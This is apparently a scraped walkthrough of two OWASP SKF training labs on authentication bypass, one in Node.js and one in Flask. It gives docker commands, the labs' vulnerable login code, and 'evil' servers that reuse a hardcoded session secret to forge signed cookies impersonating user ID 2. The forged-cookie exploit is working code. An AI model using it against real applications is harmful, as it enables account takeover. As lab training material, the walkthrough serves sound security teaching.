$ sudo docker pull blabla1337/owasp-skf-lab:js-auth-bypass$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:js-auth-bypassapp.all("/login", (req, res) => {
const sql = "SELECT * FROM users WHERE username = ? AND password = ?";
const api = "SELECT * FROM preferences WHERE UserId = ?";
if (req.method === "POST") {
db.get(sql, [req.body.username, req.body.password], (err, row) => {
if (row) {
req.session.userId = row.UserId;
req.session.secret = "e5ac-4ebf-03e5-9e29-a3f562e10b22";
req.session.loggedIn = true;
db.get(api, [req.session.userId], (err, row) => {
res.render("home.ejs", { api: row.API_key });
});
} else {
res.render("index.ejs");
}
});
} else {
db.get(api, [req.session.userId], (err, row) => {
res.render("home.ejs", { api: row.API_key });
});
}
});const cookieSession = require("cookie-session");
const express = require("express");
const cookieParser = require("cookie-parser");
const app = express();
app.use(express.static(__dirname));
app.use(cookieParser());
app.use(
cookieSession({
name: "session",
keys: ["e5ac-4ebf-03e5-9e29-a3f562e10b22"],
httpOnly: false,
maxAge: 86400000,
})
);
app.get("", (req, res) => {
req.session.userId = 2; // CHANGED THE USER ID
req.session.secret = "e5ac-4ebf-03e5-9e29-a3f562e10b22";
req.session.loggedIn = true;
res.render("evil.ejs");
});
const port = process.env.PORT || 1337;
app.listen(port, "0.0.0.0", () =>
console.log(`Listening on port ${port}...!!!`)
);$ npm install express ejs cookie-session cookie-parser<p>The newly created cookie for doing the bypass:</p>
<script>
alert(document.cookie);
</script>$ node evil_server.js
$ sudo docker pull blabla1337/owasp-skf-lab:auth-bypass$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:auth-bypass
app.config.update(dict(
SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",
SESSION_COOKIE_HTTPONLY = True
))
@app.route("/login", methods=['GET', 'POST'])
def login():
sqli = Classes()
if request.method == "POST":
values = sqli.getUser(request.form['username'])
if values:
if values[0][2] == request.form['password']:
session['userId'] = values[0][0]
session['secret'] = app.config['SECRET_KEY']
session['loggedin'] = True
pref = sqli.getApi(values[0][0])
api = pref[0][0]
return render_template("loggedin.html", api = api)
return render_template("index.html")
else:
pref = sqli.getApi(session['userId'])
api = pref[0][0]
return render_template("loggedin.html", api = api)from flask import Flask, request, url_for, render_template, redirect, make_response, session
app = Flask(__name__, static_url_path='/static', static_folder='static')
app.config.update(dict(
SECRET_KEY= "e5ac-4ebf-03e5-9e29-a3f562e10b22",
SESSION_COOKIE_HTTPONLY = False
))
app.config['DEBUG'] = True
@app.route("/")
def start():
session['userId'] = 2 # CHANGING USER ID
session['secret'] = app.config['SECRET_KEY']
session['loggedin'] = True
return render_template("evil.html")
if __name__ == "__main__":
app.run(host='0.0.0.0', port=1337)$ pip3 install flask<p>The newly created cookie for doing the bypass:</p>
<script>
alert(document.cookie);
</script>$ python3 evil_server.py
